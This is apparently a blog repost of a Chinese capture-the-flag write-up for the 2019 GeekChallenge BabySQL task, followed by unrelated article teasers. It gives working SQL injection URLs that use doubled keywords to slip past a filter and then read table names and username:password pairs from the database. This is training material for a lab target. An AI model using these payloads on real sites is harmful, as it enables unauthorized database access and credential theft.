[极客大挑战 2019]BabySQL--详细解析

[极客大挑战 2019]BabySQL--详细解析

ops/2024/11/27 1:29:18/

信息搜集

进入界面：
在这里插入图片描述
输入用户名为admin，密码随便输一个：
发现是GET传参，有username和password两个传参点。
我们测试一下password点位能不能注入：

单引号闭合报错，根据报错信息，我们可以判断是单引号闭合。

SQL注入

先order by测试一下字段数：

sql">check.php?username=admin&password=1' order by 3--+

在这里插入图片描述
报错。看报错信息，吞掉了order的or 和by，即过滤了or和by。
使用双写绕过：

sql">check.php?username=admin&password=1' oorrder bbyy 3--+

测试出字段数为3.

顺便用万能密码试试能不能登录：
在这里插入图片描述
接下来按联合注入的流程走：
union 和 select 被过滤。双写绕过：

sql">check.php?username=admin&password=1' uniunionon selselectect 1,2,3--+

在这里插入图片描述找到相应回显位，这里我们利用回显位3：

sql">check.php?username=admin&password=1' uniunionon selselectect 1,2,database()--+ 数据库名为geekcheck.php?username=admin&password=1' uniunionon selselectect 1,2,(selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whewherere table_schema='geek')--+ 数据表b4bsql,geekusercheck.php?username=admin&password=1' uniunionon selselectect 1,2,(selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whewherere table_name='b4bsql')--+ 列名id,username,password(selselectect group_concat(username,":",passwoorrd) frfromom b4bsql)--+

在这里插入图片描述
得到flag.

总结

考察的是联合注入，但是增加了过滤。
使用双写绕过。

http://www.ppmy.cn/ops/136958.html

相关文章

【AIGC】ChatGPT提示词Prompt解析：拒绝的艺术：如何优雅地说“不“

【AIGC】ChatGPT提示词Prompt解析：拒绝的艺术：如何优雅地说“不“

引言在人际交往的复杂网络中，学会优雅地拒绝是一种至关重要的社交智慧。很多人往往因为害怕伤害他人的感受，而选择敷衍、拖延或不置可否。然而，真正的智慧在于如何用尊重和同理心传达"不"的信息。本文将深入探讨优雅拒绝的艺术，帮助你在维护自身边界的同时，…

阅读更多...

动态调试对安全研究有什么帮助？

动态调试对安全研究有什么帮助？

动态调试在安全研究中提供了多方面的帮助，以下是其主要作用： 深入了解恶意软件行为：动态调试允许安全研究人员实时监视程序的执行过程，包括指令的执行情况、内存的读写情况、寄存器的状态等，从而帮助分析人员理清程序的…

阅读更多...

记录一次electron-builder报错ENOENT: no such file or directory, rename xxxx的问题

记录一次electron-builder报错ENOENT: no such file or directory, rename xxxx的问题

项目架构：vue3vitets electron版本：^33.2.0 电脑系统: macOs m1芯片版根据现有的各种文档，在package.json中配置了 "electron:build": "vite build & electron-builder build --config electron-builder.json" 命…

阅读更多...

vue中路由缓存

vue中路由缓存

vue中路由缓存问题描述及截图解决思路关键代码及打印信息截图问题描述及截图在使用某一平台时发现当列表页码切换后点击某一卡片进入详情页后，再返回列表页时页面刷新了。这样用户每次看完详情回到列表页都得再重新输入自己的查询条件，或者切换分页到…

阅读更多...

【unity小技巧】Unity 四叉树算法实现空间分割、物体存储并进行查询和碰撞检测

【unity小技巧】Unity 四叉树算法实现空间分割、物体存储并进行查询和碰撞检测

文章目录前言四叉树的工作原理四叉树的优点四叉树的应用场景案例四叉树实现空间分割和物体存储并进行查询四叉树节点类使用示例解释四叉树实现碰撞检测四叉树的构建四叉树的实现步骤1. 创建四叉树的基本类2. 在 Unity 中使用四叉树进行碰撞检测 3. 解释4. 优势5. 注意事项完…

阅读更多...

利用开源图床的技巧与实践

利用开源图床的技巧与实践

随着互联网的普及，图片的使用变得越来越广泛。无论是个人博客、社交媒体还是企业网站，都离不开图片的呈现。而图床作为图片存储和管理的工具，可以帮助开发者和内容创作者高效地管理图片资源。本文将探讨如何利用开源图床，并提供相…

阅读更多...

11.21Pytorch_属性常见转换操作

11.21Pytorch_属性常见转换操作

四、Tensor常见属性张量有device、dtype、shape等常见属性，知道这些属性对我们认识Tensor很有帮助。 1. 获取属性掌握代码调试就是掌握了一切~ import torchdef test001():data torch.tensor([1, 2, 3])print(data.dtype, data.device, data.shape)if __name…

阅读更多...

【51单片机】程序实验56.独立按键-矩阵按键

【51单片机】程序实验56.独立按键-矩阵按键

主要参考学习资料：B站【普中官方】51单片机手把手教学视频前置知识：C语言单片机套装：普中STC51单片机开发板A4标准版套餐7 码字不易，求点赞收藏加关注(•ω•̥) 有问题欢迎评论区讨论~ 目录独立按键按键介绍实验5 独立按键矩…

阅读更多...

最新文章